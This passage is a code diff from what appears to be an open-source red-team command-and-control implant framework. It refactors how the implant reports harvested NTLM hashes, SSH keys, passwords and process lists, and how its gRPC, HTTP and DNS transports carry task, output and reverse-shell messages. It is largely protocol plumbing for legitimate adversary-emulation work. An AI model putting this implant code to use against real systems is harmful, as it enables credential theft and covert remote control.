String) -> Result<(), String> { - file_impl::file(self.agent.clone(), self.task_context.clone(), path) + file_impl::file(self.agent.clone(), self.context.clone(), path) } fn process_list(&self, list: Vec>) -> Result<(), String> { - process_list_impl::process_list(self.agent.clone(), self.task_context.clone(), list) + process_list_impl::process_list(self.agent.clone(), self.context.clone(), list) } fn ssh_key(&self, username: String, key: String) -> Result<(), String> { - ssh_key_impl::ssh_key(self.agent.clone(), self.task_context.clone(), username, key) + ssh_key_impl::ssh_key(self.agent.clone(), self.context.clone(), username, key) } fn user_password(&self, username: String, password: String) -> Result<(), String> { user_password_impl::user_password( self.agent.clone(), - self.task_context.clone(), + self.context.clone(), username, password, ) } fn ntlm_hash(&self, username: String, hash: String) -> Result<(), String> { - ntlm_hash_impl::ntlm_hash( - self.agent.clone(), - self.task_context.clone(), - username, - hash, - ) + ntlm_hash_impl::ntlm_hash(self.agent.clone(), self.context.clone(), username, hash) } } diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ntlm_hash_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ntlm_hash_impl.rs index c80b1ee4b..7db4684cf 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ntlm_hash_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ntlm_hash_impl.rs @@ -1,12 +1,12 @@ use alloc::string::String; use alloc::sync::Arc; -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; +use pb::c2::report_credential_request; use pb::{c2, eldritch}; pub fn ntlm_hash( agent: Arc, - task_context: TaskContext, + context: Context, username: String, hash: String, ) -> Result<(), String> { @@ -15,8 +15,14 @@ pub fn ntlm_hash( secret: hash, kind: 3, // KIND_NTLM_HASH }; + + let context_val = match context { + Context::Task(tc) => Some(report_credential_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_credential_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportCredentialRequest { - context: Some(task_context), + context: context_val, credential: Some(cred), }; agent.report_credential(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/process_list_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/process_list_impl.rs index dc8404201..e97db79e6 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/process_list_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/process_list_impl.rs @@ -1,15 +1,15 @@ use alloc::collections::BTreeMap; -use alloc::string::ToString; +use alloc::string::{String, ToString}; use alloc::sync::Arc; use alloc::vec::Vec; -use eldritch_agent::Agent; +use eldritch_agent::{Agent, Context}; use eldritch_core::Value; -use pb::c2::TaskContext; +use pb::c2::report_process_list_request; use pb::{c2, eldritch}; pub fn process_list( agent: Arc, - task_context: TaskContext, + context: Context, list: Vec>, ) -> Result<(), String> { let mut processes = Vec::new(); @@ -61,8 +61,15 @@ pub fn process_list( }); } + let context_val = match context { + Context::Task(tc) => Some(report_process_list_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => { + Some(report_process_list_request::Context::ShellTaskContext(stc)) + } + }; + let req = c2::ReportProcessListRequest { - context: Some(task_context), + context: context_val, list: Some(eldritch::ProcessList { list: processes }), }; agent.report_process_list(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ssh_key_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ssh_key_impl.rs index b4a54c12a..e048b872c 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ssh_key_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/ssh_key_impl.rs @@ -1,12 +1,12 @@ use alloc::string::String; use alloc::sync::Arc; -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; +use pb::c2::report_credential_request; use pb::{c2, eldritch}; pub fn ssh_key( agent: Arc, - task_context: TaskContext, + context: Context, username: String, key: String, ) -> Result<(), String> { @@ -15,8 +15,14 @@ pub fn ssh_key( secret: key, kind: eldritch::credential::Kind::SshKey as i32, }; + + let context_val = match context { + Context::Task(tc) => Some(report_credential_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_credential_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportCredentialRequest { - context: Some(task_context), + context: context_val, credential: Some(cred), }; agent.report_credential(req).map(|_| ()) diff --git a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/user_password_impl.rs b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/user_password_impl.rs index b1e45a6f6..4c4b990af 100644 --- a/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/user_password_impl.rs +++ b/implants/lib/eldritch/stdlib/eldritch-libreport/src/std/user_password_impl.rs @@ -1,12 +1,12 @@ use alloc::string::String; use alloc::sync::Arc; -use eldritch_agent::Agent; -use pb::c2::TaskContext; +use eldritch_agent::{Agent, Context}; +use pb::c2::report_credential_request; use pb::{c2, eldritch}; pub fn user_password( agent: Arc, - task_context: TaskContext, + context: Context, username: String, password: String, ) -> Result<(), String> { @@ -15,8 +15,14 @@ pub fn user_password( secret: password, kind: eldritch::credential::Kind::Password as i32, }; + + let context_val = match context { + Context::Task(tc) => Some(report_credential_request::Context::TaskContext(tc)), + Context::ShellTask(stc) => Some(report_credential_request::Context::ShellTaskContext(stc)), + }; + let req = c2::ReportCredentialRequest { - context: Some(task_context), + context: context_val, credential: Some(cred), }; agent.report_credential(req).map(|_| ()) diff --git a/implants/lib/pb/src/generated/c2.rs b/implants/lib/pb/src/generated/c2.rs index 14f07580a..2fa422f93 100644 --- a/implants/lib/pb/src/generated/c2.rs +++ b/implants/lib/pb/src/generated/c2.rs @@ -168,6 +168,8 @@ pub struct ShellTask { pub sequence_id: u64, #[prost(string, tag = "5")] pub stream_id: ::prost::alloc::string::String, + #[prost(string, tag = "6")] + pub jwt: ::prost::alloc::string::String, } /// TaskError provides information when task execution fails. #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] @@ -192,6 +194,11 @@ pub struct TaskOutput { pub exec_finished_at: ::core::option::Option<::prost_types::Timestamp>, } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] +pub struct ShellTaskError { + #[prost(string, tag = "1")] + pub msg: ::prost::alloc::string::String, +} +#[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct ShellTaskOutput { #[prost(int64, tag = "1")] pub id: i64, @@ -214,6 +221,13 @@ pub struct TaskContext { #[prost(string, tag = "2")] pub jwt: ::prost::alloc::string::String, } +#[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] +pub struct ShellTaskContext { + #[prost(int64, tag = "1")] + pub shell_task_id: i64, + #[prost(string, tag = "2")] + pub jwt: ::prost::alloc::string::String, +} /// RPC Messages #[derive(Clone, PartialEq, ::prost::Message)] pub struct ClaimTasksRequest { @@ -229,10 +243,20 @@ pub struct ClaimTasksResponse { } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct FetchAssetRequest { - #[prost(string, tag = "1")] + #[prost(string, tag = "3")] pub name: ::prost::alloc::string::String, - #[prost(message, optional, tag = "2")] - pub context: ::core::option::Option, + #[prost(oneof = "fetch_asset_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `FetchAssetRequest`. +pub mod fetch_asset_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct FetchAssetResponse { @@ -241,50 +265,112 @@ pub struct FetchAssetResponse { } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReportCredentialRequest { - #[prost(message, optional, tag = "1")] - pub context: ::core::option::Option, - #[prost(message, optional, tag = "2")] + #[prost(message, optional, tag = "3")] pub credential: ::core::option::Option, + #[prost(oneof = "report_credential_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `ReportCredentialRequest`. +pub mod report_credential_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, Copy, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReportCredentialResponse {} #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReportFileRequest { - #[prost(message, optional, tag = "1")] - pub context: ::core::option::Option, - #[prost(message, optional, tag = "2")] + #[prost(enumeration = "ReportFileKind", tag = "3")] + pub kind: i32, + #[prost(message, optional, tag = "4")] pub chunk: ::core::option::Option, + #[prost(oneof = "report_file_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `ReportFileRequest`. +pub mod report_file_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, Copy, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReportFileResponse {} #[derive(Clone, PartialEq, ::prost::Message)] pub struct ReportProcessListRequest { - #[prost(message, optional, tag = "1")] - pub context: ::core::option::Option, - #[prost(message, optional, tag = "2")] + #[prost(message, optional, tag = "3")] pub list: ::core::option::Option, + #[prost(oneof = "report_process_list_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `ReportProcessListRequest`. +pub mod report_process_list_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, Copy, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReportProcessListResponse {} #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] -pub struct ReportTaskOutputRequest { +pub struct ReportTaskOutputMessage { #[prost(message, optional, tag = "1")] + pub context: ::core::option::Option, + #[prost(message, optional, tag = "2")] pub output: ::core::option::Option, +} +#[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] +pub struct ReportShellTaskOutputMessage { + #[prost(message, optional, tag = "1")] + pub context: ::core::option::Option, #[prost(message, optional, tag = "2")] - pub context: ::core::option::Option, - #[prost(message, optional, tag = "3")] - pub shell_task_output: ::core::option::Option, + pub output: ::core::option::Option, +} +#[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] +pub struct ReportOutputRequest { + #[prost(oneof = "report_output_request::Message", tags = "1, 2")] + pub message: ::core::option::Option, +} +/// Nested message and enum types in `ReportOutputRequest`. +pub mod report_output_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Message { + #[prost(message, tag = "1")] + TaskOutput(super::ReportTaskOutputMessage), + #[prost(message, tag = "2")] + ShellTaskOutput(super::ReportShellTaskOutputMessage), + } } #[derive(Clone, Copy, PartialEq, Eq, Hash, ::prost::Message)] -pub struct ReportTaskOutputResponse {} +pub struct ReportOutputResponse {} #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReverseShellRequest { - #[prost(enumeration = "ReverseShellMessageKind", tag = "1")] + #[prost(enumeration = "ReverseShellMessageKind", tag = "3")] pub kind: i32, - #[prost(bytes = "vec", tag = "2")] + #[prost(bytes = "vec", tag = "4")] pub data: ::prost::alloc::vec::Vec, - #[prost(message, optional, tag = "3")] - pub context: ::core::option::Option, + #[prost(oneof = "reverse_shell_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `ReverseShellRequest`. +pub mod reverse_shell_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct ReverseShellResponse { @@ -295,18 +381,57 @@ pub struct ReverseShellResponse { } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct CreatePortalRequest { - #[prost(message, optional, tag = "1")] - pub context: ::core::option::Option, - #[prost(message, optional, tag = "2")] + #[prost(message, optional, tag = "3")] pub mote: ::core::option::Option, + #[prost(oneof = "create_portal_request::Context", tags = "1, 2")] + pub context: ::core::option::Option, +} +/// Nested message and enum types in `CreatePortalRequest`. +pub mod create_portal_request { + #[derive(Clone, PartialEq, Eq, Hash, ::prost::Oneof)] + pub enum Context { + #[prost(message, tag = "1")] + TaskContext(super::TaskContext), + #[prost(message, tag = "2")] + ShellTaskContext(super::ShellTaskContext), + } } #[derive(Clone, PartialEq, Eq, Hash, ::prost::Message)] pub struct CreatePortalResponse { - #[prost(message, optional, tag = "2")] + #[prost(message, optional, tag = "1")] pub mote: ::core::option::Option, } #[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] #[repr(i32)] +pub enum ReportFileKind { + Unspecified = 0, + Ondisk = 1, + Screenshot = 2, +} +impl ReportFileKind { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. + pub fn as_str_name(&self) -> &'static str { + match self { + Self::Unspecified => "REPORT_FILE_KIND_UNSPECIFIED", + Self::Ondisk => "REPORT_FILE_KIND_ONDISK", + Self::Screenshot => "REPORT_FILE_KIND_SCREENSHOT", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "REPORT_FILE_KIND_UNSPECIFIED" => Some(Self::Unspecified), + "REPORT_FILE_KIND_ONDISK" => Some(Self::Ondisk), + "REPORT_FILE_KIND_SCREENSHOT" => Some(Self::Screenshot), + _ => None, + } + } +} +#[derive(Clone, Copy, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, ::prost::Enumeration)] +#[repr(i32)] pub enum ReverseShellMessageKind { Unspecified = 0, Data = 1, @@ -550,12 +675,12 @@ pub mod c2_client { req.extensions_mut().insert(GrpcMethod::new("c2.C2", "ReportProcessList")); self.inner.unary(req, path, codec).await } - /// Report execution output for a task. - pub async fn report_task_output( + /// Report execution output. + pub async fn report_output( &mut self, - request: impl tonic::IntoRequest, + request: impl tonic::IntoRequest, ) -> std::result::Result< - tonic::Response, + tonic::Response, tonic::Status, > { self.inner @@ -567,9 +692,9 @@ pub mod c2_client { ) })?; let codec = crate::xchacha::ChachaCodec::default(); - let path = http::uri::PathAndQuery::from_static("/c2.C2/ReportTaskOutput"); + let path = http::uri::PathAndQuery::from_static("/c2.C2/ReportOutput"); let mut req = request.into_request(); - req.extensions_mut().insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); + req.extensions_mut().insert(GrpcMethod::new("c2.C2", "ReportOutput")); self.inner.unary(req, path, codec).await } /// Open a reverse shell bi-directional stream. diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 99bef0821..569dee331 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1143,11 +1143,11 @@ impl Transport for DNS { self.dns_exchange(request, "/c2.C2/ReportProcessList").await } - async fn report_task_output( + async fn report_output( &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - self.dns_exchange(request, "/c2.C2/ReportTaskOutput").await + request: ReportOutputRequest, + ) -> Result { + self.dns_exchange(request, "/c2.C2/ReportOutput").await } async fn reverse_shell( diff --git a/implants/lib/transport/src/grpc.rs b/implants/lib/transport/src/grpc.rs index da0c04bdb..ff128699a 100644 --- a/implants/lib/transport/src/grpc.rs +++ b/implants/lib/transport/src/grpc.rs @@ -58,7 +58,7 @@ static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; -static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; +static REPORT_OUTPUT_PATH: &str = "/c2.C2/ReportOutput"; static REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell"; static CREATE_PORTAL_PATH: &str = "/c2.C2/CreatePortal"; @@ -238,11 +238,11 @@ impl Transport for GRPC { Ok(resp.into_inner()) } - async fn report_task_output( + async fn report_output( &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - let resp = self.report_task_output_impl(request).await?; + request: ReportOutputRequest, + ) -> Result { + let resp = self.report_output_impl(request).await?; Ok(resp.into_inner()) } @@ -496,10 +496,10 @@ impl GRPC { /// /// Report execution output for a task. - pub async fn report_task_output_impl( + pub async fn report_output_impl( &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> { + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { if self.grpc.is_none() { return Err(tonic::Status::new( tonic::Code::FailedPrecondition, @@ -513,10 +513,10 @@ impl GRPC { ) })?; let codec = pb::xchacha::ChachaCodec::default(); - let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_TASK_OUTPUT_PATH); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_OUTPUT_PATH); let mut req = request.into_request(); req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); + .insert(GrpcMethod::new("c2.C2", "ReportOutput")); self.grpc.as_mut().unwrap().unary(req, path, codec).await } diff --git a/implants/lib/transport/src/http.rs b/implants/lib/transport/src/http.rs index 983df2ee3..4c9339db9 100644 --- a/implants/lib/transport/src/http.rs +++ b/implants/lib/transport/src/http.rs @@ -88,7 +88,7 @@ static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential"; static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile"; static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList"; -static REPORT_TASK_OUTPUT_PATH: &str = "/c2.C2/ReportTaskOutput"; +static REPORT_OUTPUT_PATH: &str = "/c2.C2/ReportOutput"; static _REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell"; // Marshal: Encode and encrypt a message using the ChachaCodec @@ -523,11 +523,11 @@ impl Transport for HTTP { self.unary_rpc(request, REPORT_PROCESS_LIST_PATH).await } - async fn report_task_output( + async fn report_output( &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - self.unary_rpc(request, REPORT_TASK_OUTPUT_PATH).await + request: ReportOutputRequest, + ) -> Result { + self.unary_rpc(request, REPORT_OUTPUT_PATH).await } async fn reverse_shell( diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 7bd1c7f6e..3b04b5a9c 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -168,19 +168,19 @@ impl Transport for ActiveTransport { } } - async fn report_task_output( + async fn report_output( &mut self, - request: ReportTaskOutputRequest, - ) -> Result { + request: ReportOutputRequest, + ) -> Result { match self { #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_task_output(request).await, + Self::Grpc(t) => t.report_output(request).await, #[cfg(feature = "http1")] - Self::Http(t) => t.report_task_output(request).await, + Self::Http(t) => t.report_output(request).await, #[cfg(feature = "dns")] - Self::Dns(t) => t.report_task_output(request).await, + Self::Dns(t) => t.report_output(request).await, #[cfg(feature = "mock")] - Self::Mock(t) => t.report_task_output(request).await, + Self::Mock(t) => t.report_output(request).await, Self::Empty => Err(anyhow!("Transport not initialized")), } } diff --git a/implants/lib/transport/src/mock.rs b/implants/lib/transport/src/mock.rs index 75e87620b..79279fc8a 100644 --- a/implants/lib/transport/src/mock.rs +++ b/implants/lib/transport/src/mock.rs @@ -37,10 +37,10 @@ mock! { request: ReportProcessListRequest, ) -> Result; - async fn report_task_output( + async fn report_output( &mut self, - request: ReportTaskOutputRequest, - ) -> Result; + request: ReportOutputRequest, + ) -> Result; async fn reverse_shell( &mut self, diff --git a/implants/lib/transport/src/transport.rs b/implants/lib/transport/src/transport.rs index f1688af5d..2a366a6b3 100644 --- a/implants/lib/transport/src/transport.rs +++ b/implants/lib/transport/src/transport.rs @@ -113,10 +113,8 @@ pub trait UnsafeTransport: Clone + Send { /// /// Report execution output for a task. #[allow(dead_code)] - async fn report_task_output( - &mut self, - request: ReportTaskOutputRequest, - ) -> Result; + async fn report_output(&mut self, request: ReportOutputRequest) + -> Result; /// /// Open a shell via the transport. diff --git a/tavern/internal/builder/builderpb/builder.pb.go b/tavern/internal/builder/builderpb/builder.pb.go index b4a5334a8..9b043509a 100644 --- a/tavern/internal/builder/builderpb/builder.pb.go +++ b/tavern/internal/builder/builderpb/builder.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go. DO NOT EDIT. // versions: -// protoc-gen-go v1.36.11 -// protoc v4.25.1 +// protoc-gen-go v1.36.5 +// protoc v3.21.12 // source: builder.proto package builderpb @@ -455,42 +455,82 @@ func (x *UploadBuildArtifactResponse) GetAssetId() int64 { var File_builder_proto protoreflect.FileDescriptor -const file_builder_proto_rawDesc = "" + - "\n" + - "\rbuilder.proto\x12\abuilder\"\x18\n" + - "\x16ClaimBuildTasksRequest\"\xb7\x01\n" + - "\rBuildTaskSpec\x12\x0e\n" + - "\x02id\x18\x01 \x01(\x03R\x02id\x12\x1b\n" + - "\ttarget_os\x18\x02 \x01(\tR\btargetOs\x12\x1f\n" + - "\vbuild_image\x18\x03 \x01(\tR\n" + - "buildImage\x12!\n" + - "\fbuild_script\x18\x04 \x01(\tR\vbuildScript\x12#\n" + - "\rartifact_path\x18\x06 \x01(\tR\fartifactPath\x12\x10\n" + - "\x03env\x18\a \x03(\tR\x03env\"G\n" + - "\x17ClaimBuildTasksResponse\x12,\n" + - "\x05tasks\x18\x01 \x03(\v2\x16.builder.BuildTaskSpecR\x05tasks\"\x9e\x01\n" + - "\x1cStreamBuildTaskOutputRequest\x12\x17\n" + - "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12\x16\n" + - "\x06output\x18\x02 \x01(\tR\x06output\x12\x14\n" + - "\x05error\x18\x03 \x01(\tR\x05error\x12\x1a\n" + - "\bfinished\x18\x04 \x01(\bR\bfinished\x12\x1b\n" + - "\texit_code\x18\x05 \x01(\x03R\bexitCode\"\x1f\n" + - "\x1dStreamBuildTaskOutputResponse\"p\n" + - "\x1aUploadBuildArtifactRequest\x12\x17\n" + - "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12#\n" + - "\rartifact_name\x18\x02 \x01(\tR\fartifactName\x12\x14\n" + - "\x05chunk\x18\x03 \x01(\fR\x05chunk\"8\n" + - "\x1bUploadBuildArtifactResponse\x12\x19\n" + - "\basset_id\x18\x01 \x01(\x03R\aassetId*\x81\x01\n" + - "\fTargetFormat\x12\x1d\n" + - "\x19TARGET_FORMAT_UNSPECIFIED\x10\x00\x12\x15\n" + - "\x11TARGET_FORMAT_BIN\x10\x01\x12\x18\n" + - "\x14TARGET_FORMAT_CDYLIB\x10\x02\x12!\n" + - "\x1dTARGET_FORMAT_WINDOWS_SERVICE\x10\x032\xb3\x02\n" + - "\aBuilder\x12V\n" + - "\x0fClaimBuildTasks\x12\x1f.builder.ClaimBuildTasksRequest\x1a .builder.ClaimBuildTasksResponse\"\x00\x12j\n" + - "\x15StreamBuildTaskOutput\x12%.builder.StreamBuildTaskOutputRequest\x1a&.builder.StreamBuildTaskOutputResponse\"\x00(\x01\x12d\n" + - "\x13UploadBuildArtifact\x12#.builder.UploadBuildArtifactRequest\x1a$.builder.UploadBuildArtifactResponse\"\x00(\x01B-Z+realm.pub/tavern/internal/builder/builderpbb\x06proto3" +var file_builder_proto_rawDesc = string([]byte{ + 0x0a, 0x0d, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, + 0x07, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, 0x22, 0x18, 0x0a, 0x16, 0x43, 0x6c, 0x61, 0x69, + 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x22, 0xb7, 0x01, 0x0a, 0x0d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, + 0x53, 0x70, 0x65, 0x63, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, + 0x52, 0x02, 0x69, 0x64, 0x12, 0x1b, 0x0a, 0x09, 0x74, 0x61, 0x72, 0x67, 0x65, 0x74, 0x5f, 0x6f, + 0x73, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x08, 0x74, 0x61, 0x72, 0x67, 0x65, 0x74, 0x4f, + 0x73, 0x12, 0x1f, 0x0a, 0x0b, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x5f, 0x69, 0x6d, 0x61, 0x67, 0x65, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x49, 0x6d, 0x61, + 0x67, 0x65, 0x12, 0x21, 0x0a, 0x0c, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x5f, 0x73, 0x63, 0x72, 0x69, + 0x70, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x53, + 0x63, 0x72, 0x69, 0x70, 0x74, 0x12, 0x23, 0x0a, 0x0d, 0x61, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, + 0x74, 0x5f, 0x70, 0x61, 0x74, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0c, 0x61, 0x72, + 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x50, 0x61, 0x74, 0x68, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, + 0x76, 0x18, 0x07, 0x20, 0x03, 0x28, 0x09, 0x52, 0x03, 0x65, 0x6e, 0x76, 0x22, 0x47, 0x0a, 0x17, + 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x2c, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, + 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x16, 0x2e, 0x62, 0x75, 0x69, 0x6c, 0x64, 0x65, 0x72, + 0x2e, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x53, 0x70, 0x65, 0x63, 0x52, 0x05, + 0x74, 0x61, 0x73, 0x6b, 0x73, 0x22, 0x9e, 0x01, 0x0a, 0x1c, 0x53, 0x74, 0x72, 0x65, 0x61, 0x6d, + 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, + 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, + 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, + 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x14, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x1a, 0x0a, + 0x08, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x18, 0x04, 0x20, 0x01, 0x28, 0x08, 0x52, + 0x08, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x12, 0x1b, 0x0a, 0x09, 0x65, 0x78, 0x69, + 0x74, 0x5f, 0x63, 0x6f, 0x64, 0x65, 0x18, 0x05, 0x20, 0x01, 0x28, 0x03, 0x52, 0x08, 0x65, 0x78, + 0x69, 0x74, 0x43, 0x6f, 0x64, 0x65, 0x22, 0x1f, 0x0a, 0x1d, 0x53, 0x74, 0x72, 0x65, 0x61, 0x6d, + 0x42, 0x75, 0x69, 0x6c, 0x64, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, + 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x70, 0x0a, 0x1a, 0x55, 0x70, 0x6c, 0x6f, 0x61, + 0x64, 0x42, 0x75, 0x69, 0x6c, 0x64, 0x41, 0x72, 0x74, 0x69, 0x66, 0x61, 0x63, 0x74, 0x52, 0x65, + 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, + 